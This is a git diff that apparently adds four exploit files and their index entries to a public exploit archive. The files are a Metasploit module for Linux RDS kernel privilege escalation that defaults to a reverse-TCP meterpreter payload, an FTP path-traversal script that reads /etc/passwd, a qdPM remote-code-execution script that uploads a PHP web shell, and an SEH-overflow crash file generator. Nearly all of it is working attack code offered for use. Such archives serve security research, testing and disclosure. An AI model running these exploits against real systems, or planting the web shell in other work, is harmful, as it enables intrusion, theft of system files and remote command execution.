diff --git a/exploits/linux/local/47957.rb b/exploits/linux/local/47957.rb new file mode 100755 index 000000000..f57164512 --- /dev/null +++ b/exploits/linux/local/47957.rb @@ -0,0 +1,166 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = GoodRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::Compile + include Msf::Post::Linux::System + include Msf::Post::Linux::Kernel + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation', + 'Description' => %q{ + This module attempts to gain root privileges on Linux systems by abusing + a NULL pointer dereference in the `rds_atomic_free_op` function in the + Reliable Datagram Sockets (RDS) kernel module (rds.ko). + + Successful exploitation requires the RDS kernel module to be loaded. + If the RDS module is not blacklisted (default); then it will be loaded + automatically. + + This exploit supports 64-bit Ubuntu Linux systems, including distributions + based on Ubuntu, such as Linux Mint and Zorin OS. + + Target offsets are available for: + + Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116-generic; and + Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54-generic. + + This exploit does not bypass SMAP. Bypasses for SMEP and KASLR are included. + Failed exploitation may crash the kernel. + + This module has been tested successfully on various 4.4 and 4.8 kernels. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mohamed Ghannam', # Discovery of RDS rds_atomic_free_op null pointer dereference and DoS PoC (2018-5333) + 'Jann Horn', # Discovery of MAP_GROWSDOWN mmap_min_addr bypass technique and PoC code (CVE-2019-9213) + 'wbowling', # C exploit combining 2018-5333 and CVE-2019-9213 targeting Ubuntu 16.04 kernel 4.4.0-116-generic + 'bcoles', # Metasploit module and updated C exploit + 'nstarke' # Additional kernel offsets + ], + 'DisclosureDate' => '2018-11-01', + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Auto', {} ]], + 'Privileged' => true, + 'References' => + [ + [ 'CVE', '2018-5333' ], + [ 'CVE', '2019-9213' ], + [ 'BID', '102510' ], + [ 'URL', 'https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4' ], + [ 'URL', 'https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c' ], + [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2' ], + [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-5333.html' ], + [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7d11f77f84b27cef452cee332f4e469503084737' ], + [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=15133f6e67d8d646d0744336b4daa3135452cb0d' ], + [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2018-5333/cve-2018-5333.c' ] + ], + 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }, + 'Notes' => + { + 'Reliability' => [ REPEATABLE_SESSION ], + 'Stability' => [ CRASH_OS_DOWN ], + }, + 'DefaultTarget' => 0)) + register_advanced_options [ + OptBool.new('ForceExploit', [ false, 'Override check result', false ]), + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) + ] + end + + def base_dir + datastore['WritableDir'].to_s + end + + def check + arch = kernel_hardware + unless arch.include? 'x86_64' + return CheckCode::Safe("System architecture #{arch} is not supported") + end + vprint_good "System architecture #{arch} is supported" + + offsets = strip_comments(exploit_data('CVE-2018-5333', 'cve-2018-5333.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first + kernels = offsets.scan(/"(.+?)"/).flatten + + version = "#{kernel_release} #{kernel_version.split(' ').first}" + unless kernels.include? version + return CheckCode::Safe("Linux kernel #{version} is not vulnerable") + end + vprint_good "Linux kernel #{version} is vulnerable" + + if smap_enabled? + return CheckCode::Safe('SMAP is enabled') + end + vprint_good 'SMAP is not enabled' + + if lkrg_installed? + return CheckCode::Safe('LKRG is installed') + end + vprint_good 'LKRG is not installed' + + if grsec_installed? + return CheckCode::Safe('grsecurity is in use') + end + vprint_good 'grsecurity is not in use' + + unless kernel_modules.include? 'rds' + vprint_warning 'rds.ko kernel module is not loaded, but may be autoloaded during exploitation' + return CheckCode::Detected('rds.ko kernel module is not loaded, but may be autoloaded during exploitation') + end + vprint_good 'rds.ko kernel module is loaded' + + CheckCode::Appears + end + + def exploit + unless [CheckCode::Detected, CheckCode::Appears].include? check + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + if is_root? + unless datastore['ForceExploit'] + fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' + end + end + + unless writable? base_dir + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + exploit_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}" + + if live_compile? + vprint_status 'Live compiling exploit on system...' + upload_and_compile exploit_path, exploit_data('CVE-2018-5333', 'cve-2018-5333.c') + else + vprint_status 'Dropping pre-compiled exploit on system...' + upload_and_chmodx exploit_path, exploit_data('CVE-2018-5333', 'cve-2018-5333.out') + end + register_file_for_cleanup exploit_path + + payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}" + upload_and_chmodx payload_path, generate_payload_exe + register_file_for_cleanup payload_path + + # mincore KASLR bypass is usually fast, but can sometimes take up to 30 seconds to complete + timeout = 30 + print_status "Launching exploit (timeout: #{timeout})..." + output = cmd_exec("echo '#{payload_path} & exit' | #{exploit_path}", nil, timeout) + output.each_line { |line| vprint_status line.chomp } + end +end \ No newline at end of file diff --git a/exploits/linux/remote/47956.py b/exploits/linux/remote/47956.py new file mode 100755 index 000000000..f7f0045a1 --- /dev/null +++ b/exploits/linux/remote/47956.py @@ -0,0 +1,19 @@ +# Exploit Title: Pachev FTP Server 1.0 - Path Traversal +# Date: 2020-01-23 +# Vulnerability: Path Traversal +# Exploit Author: 1F98D +# Vendor Homepage: https://github.com/pachev/pachev_ftp + +from ftplib import FTP + +ip = raw_input("Target IP: ") +port = int(raw_input("Target Port: ")) + +ftp = FTP() +ftp.connect(host=ip, port=port) +ftp.login('pachev', '') +ftp.retrbinary('RETR ../../../../../../../../etc/passwd', open('passwd.txt', 'wb').write) +ftp.close() +file = open('passwd.txt', 'r') +print "[**] Printing the contents of /etc/passwd\n" +print file.read() \ No newline at end of file diff --git a/exploits/php/webapps/47954.py b/exploits/php/webapps/47954.py new file mode 100755 index 000000000..e846c590b --- /dev/null +++ b/exploits/php/webapps/47954.py @@ -0,0 +1,130 @@ +# Exploit Title: qdPM 9.1 - Remote Code Execution +# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net +# Date: 2020-01-22 +# Exploit Author: Rishal Dwivedi (Loginsoft) +# Vendor Homepage: http://qdpm.net/ +# Software Link: http://qdpm.net/download-qdpm-free-project-management +# Version: <=1.9.1 +# Tested on: Windows 10 (Python 2.7) +# CVE : CVE-2020-7246 +# Exploit written in Python 2.7 +# Tested Environment - Windows 10 +# Path Traversal + Remote Code Execution + +# Command - qdpm-exploit.py -url http://localhost/ -u user@localhost.com -p password +# -*- coding: utf-8 -*- +#!/usr/bin/python + +import requests +from lxml import html +from argparse import ArgumentParser + +session_requests = requests.session() + +def multifrm( + userid, + username, + csrftoken_, + EMAIL, + HOSTNAME, + uservar, + ): + request_1 = { + 'sf_method': (None, 'put'), + 'users[id]': (None, userid[-1]), + 'users[photo_preview]': (None, uservar), + 'users[_csrf_token]': (None, csrftoken_[-1]), + 'users[name]': (None, username[-1]), + 'users[new_password]': (None, ''), + 'users[email]': (None, EMAIL), + 'extra_fields[9]': (None, ''), + 'users[remove_photo]': (None, '1'), + } + return request_1 + + +def req( + userid, + username, + csrftoken_, + EMAIL, + HOSTNAME, + ): + request_1 = multifrm( + userid, + username, + csrftoken_, + EMAIL, + HOSTNAME, + '.htaccess', + ) + new = session_requests.post(HOSTNAME + 'index.php/myAccount/update' + , files=request_1) + request_2 = multifrm( + userid, + username, + csrftoken_, + EMAIL, + HOSTNAME, + '../.htaccess', + ) + new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update' + , files=request_2) + request_3 = { + 'sf_method': (None, 'put'), + 'users[id]': (None, userid[-1]), + 'users[photo_preview]': (None, ''), + 'users[_csrf_token]': (None, csrftoken_[-1]), + 'users[name]': (None, username[-1]), + 'users[new_password]': (None, ''), + 'users[email]': (None, EMAIL), + 'extra_fields[9]': (None, ''), + 'users[photo]': ('backdoor.php', + '"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo ""; die; }?>' + , 'application/octet-stream'), + } + upload_req = session_requests.post(HOSTNAME + + 'index.php/myAccount/update', files=request_3) + + +def main(HOSTNAME, EMAIL, PASSWORD): + result = session_requests.get(HOSTNAME + '/index.php/login') + login_tree = html.fromstring(result.text) + authenticity_token = \ + list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value" + )))[0] + payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, + 'login[_csrf_token]': authenticity_token} + result = session_requests.post(HOSTNAME + '/index.php/login', + data=payload, + headers=dict(referer=HOSTNAME + + '/index.php/login')) + account_page = session_requests.get(HOSTNAME + 'index.php/myAccount' + ) + account_tree = html.fromstring(account_page.content) + userid = account_tree.xpath("//input[@name='users[id]']/@value") + username = account_tree.xpath("//input[@name='users[name]']/@value") + csrftoken_ = \ + account_tree.xpath("//input[@name='users[_csrf_token]']/@value") + req(userid, username, csrftoken_, EMAIL, HOSTNAME) + get_file = session_requests.get(HOSTNAME + 'index.php/myAccount') + final_tree = html.fromstring(get_file.content) + backdoor = \ + final_tree.xpath("//input[@name='users[photo_preview]']/@value") + print 'Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/' \ + + backdoor[-1] + '?cmd=whoami' + + +if __name__ == '__main__': + parser = \ + ArgumentParser(description='qdmp - Path traversal + RCE Exploit' + ) + parser.add_argument('-url', '--host', dest='hostname', + help='Project URL') + parser.add_argument('-u', '--email', dest='email', + help='User email (Any privilege account)') + parser.add_argument('-p', '--password', dest='password', + help='User password') + args = parser.parse_args() + + main(args.hostname, args.email, args.password) \ No newline at end of file diff --git a/exploits/windows/dos/47955.py b/exploits/windows/dos/47955.py new file mode 100755 index 000000000..847df2bd7 --- /dev/null +++ b/exploits/windows/dos/47955.py @@ -0,0 +1,48 @@ +# Exploit Title: BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC) +# Exploit Author: boku +# Date: 2020-01-22 +# Software Vendor: Wierd Solutions +# Vendor Homepage: https://www.weird-solutions.com +# Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe +# Version: BOOTP Turbo (x86) Version 2.0 +# Tested On: Windows 10 Pro -- 10.0.18363 Build 18363 x86-based PC +# Tested On: Windows 7 Enterprise SP1 -- build 7601 64-bit +# Replicate Crash: +# 1) Download, Install, and Open BootP Turbo v2.0 for windows x86 +# 2) Go to Edit > Settings > Click the Detailed Logging Box +# 3) Run python script, open created file 'crash.txt' +# 4) Select-All > Copy All, from file +# 5) Paste buffer in the 'Log File' text-box, Click 'OK' +# 6) Close the 'Control Service' Pop-Up Window +# 7) Crash with SEH Overwrite + +# SEH chain of main thread +# Address SE handler +# 019CD254 43434343 +# 42424242 *** CORRUPT ENTRY *** + +# Loaded Application Modules +# Rebase | SafeSEH | ASLR | NXCompat | Version, Modulename & Path +# True | True | False | False | 4.7.3.0 [QtGui4.dll] (C:\Program Files\BOOTP Turbo\QtGui4.dll) +# True | True | False | False | 4.7.3.0 [QtCore4.dll] (C:\Program Files\BOOTP Turbo\QtCore4.dll) +# True | True | False | False | 10.00.30319.1 [MSVCP100.dll] (C:\Program Files\BOOTP Turbo\MSVCP100.dll) +# True | True | False | False | 2.0 [bootptui.exe] (C:\Program Files\BOOTP Turbo\bootptui.exe) +# True | True | False | False | 10.00.30319.1 [MSVCR100.dll] (C:\Program Files\BOOTP Turbo\MSVCR100.dll) + +#!/usr/bin/python + +offset = '\x41'*2196 +nSEH = '\x42\x42\x42\x42' +SEH = '\x43\x43\x43\x43' +filler = '\x44'*(3000-len(offset+nSEH+SEH)) + +payload = offset+nSEH+SEH+filler + +try: + f=open("crash.txt","w") + print("[+] Creating %s bytes evil payload." %len(payload)) + f.write(payload) + f.close() + print("[+] File created!") +except: + print("File cannot be created.") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index cfe324f53..4efcaa2bb 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6661,6 +6661,7 @@ id,file,description,date,author,type,platform,port 47942,exploits/windows/dos/47942.py,"GTalk Password Finder 2.2.1 - 'Key' Denial of Service (PoC)",2020-01-17,"Ismail Tasdelen",dos,windows, 47947,exploits/windows/dos/47947.py,"Sysax Multi Server 5.50 - Denial of Service (PoC)",2020-01-20,"Shailesh Kumavat",dos,windows, 47952,exploits/multiple/dos/47952.txt,"KeePass 2.44 - Denial of Service (PoC)",2020-01-22,"Mustafa Emre Gül",dos,multiple, +47955,exploits/windows/dos/47955.py,"BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)",2020-01-23,boku,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10915,6 +10916,7 @@ id,file,description,date,author,type,platform,port 47944,exploits/windows/local/47944.rb,"Plantronics Hub 3.13.2 - SpokesUpdateService Privilege Escalation (Metasploit)",2020-01-17,Metasploit,local,windows, 47945,exploits/xml/local/47945.txt,"Easy XML Editor 1.7.8 - XML External Entity Injection",2020-01-20,"Javier Olmedo",local,xml, 47950,exploits/windows/local/47950.txt,"NEOWISE CARBONFTP 1.4 - Weak Password Encryption",2020-01-21,hyp3rlinx,local,windows, +47957,exploits/linux/local/47957.rb,"Reliable Datagram Sockets (RDS) - rds_atomic_free_op NULL pointer dereference Privilege Escalation (Metasploit)",2020-01-23,Metasploit,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17944,6 +17946,7 @@ id,file,description,date,author,type,platform,port 47891,exploits/java/remote/47891.txt,"JetBrains TeamCity 2018.2.4 - Remote Code Execution",2020-01-08,hantwister,remote,java, 47924,exploits/linux/remote/47924.rb,"Barco WePresent - file_transfer.cgi Command Injection (Metasploit)",2020-01-15,Metasploit,remote,linux, 47936,exploits/hardware/remote/47936.js,"Sagemcom F@ST 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution",2020-01-15,Lyrebirds,remote,hardware, +47956,exploits/linux/remote/47956.py,"Pachev FTP Server 1.0 - Path Traversal",2020-01-23,1F98D,remote,linux, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -42252,4 +42255,5 @@ id,file,description,date,author,type,platform,port 47946,exploits/php/webapps/47946.txt,"Adive Framework 2.0.8 - Persistent Cross-Site Scripting",2020-01-20,"Sarthak Saini",webapps,php, 47948,exploits/php/webapps/47948.rb,"Centreon 19.04 - Authenticated Remote Code Execution (Metasploit)",2020-01-20,TheCyberGeek,webapps,php, 47949,exploits/java/webapps/47949.txt,"ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection",2020-01-21,"Ertebat Gostar Co",webapps,java, +47954,exploits/php/webapps/47954.py,"qdPM 9.1 - Remote Code Execution",2020-01-23,"Rishal Dwivedi",webapps,php, 47951,exploits/xml/webapps/47951.py,"Citrix XenMobile Server 10.8 - XML External Entity Injection",2020-01-22,"Jonas Lejon",webapps,xml,